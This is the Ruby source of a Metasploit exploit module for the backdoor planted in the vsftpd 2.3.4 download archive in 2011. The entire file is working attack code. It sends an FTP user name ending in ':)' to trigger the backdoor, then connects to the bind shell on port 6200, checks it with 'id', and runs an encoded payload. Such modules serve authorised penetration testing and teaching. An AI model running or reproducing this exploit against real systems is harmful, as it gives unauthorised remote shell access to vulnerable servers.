1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
16
        'Description' => %q{
17
          This module exploits a malicious backdoor that was added to the	VSFTPD download
18
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
19
          June 30th 2011 and July 1st 2011 according to the most recent information
20
          available. This backdoor was removed on July 3rd 2011.
21
        },
22
        'Author' => [ 'hdm', 'MC' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'OSVDB', '73573'],
26
          [ 'URL', 'http://pastebin.com/AetT9sS5'],
27
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
28
        ],
29
        'Privileged' => true,
30
        'Platform' => [ 'unix' ],
31
        'Arch' => ARCH_CMD,
32
        'Payload' => {
33
          'Space' => 2000,
34
          'BadChars' => '',
35
          'DisableNops' => true,
36
          'Compat' =>
37
                        {
38
                          'PayloadType' => 'cmd_interact',
39
                          'ConnectionType' => 'find'
40
                        }
41
        },
42
        'Targets' => [
43
          [ 'Automatic', {} ],
44
        ],
45
        'DisclosureDate' => '2011-07-03',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options([ Opt::RPORT(21) ])
56
  end
57

58
  def exploit
59
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
60
    if nsock
61
      print_status("The port used by the backdoor bind listener is already open")
62
      handle_backdoor(nsock)
63
      return
64
    end
65

66
    # Connect to the FTP service port first
67
    connect
68

69
    banner = sock.get_once(-1, 30).to_s
70
    print_status("Banner: #{banner.strip}")
71

72
    sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n")
73
    resp = sock.get_once(-1, 30).to_s
74
    print_status("USER: #{resp.strip}")
75

76
    if resp =~ /^530 /
77
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
78
      disconnect
79
      return
80
    end
81

82
    if resp !~ /^331 /
83
      print_error("This server did not respond as expected: #{resp.strip}")
84
      disconnect
85
      return
86
    end
87

88
    sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n")
89

90
    # Do not bother reading the response from password, just try the backdoor
91
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
92
    if nsock
93
      print_good("Backdoor service has been spawned, handling...")
94
      handle_backdoor(nsock)
95
      return
96
    end
97

98
    disconnect
99
  end
100

101
  def handle_backdoor(s)
102
    s.put("id\n")
103

104
    r = s.get_once(-1, 5).to_s
105
    if r !~ /uid=/
106
      print_error("The service on port 6200 does not appear to be a shell")
107
      disconnect(s)
108
      return
109
    end
110

111
    print_good("UID: #{r.strip}")
112

113
    s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
114
    handler(s)
115
  end
116
end
117

118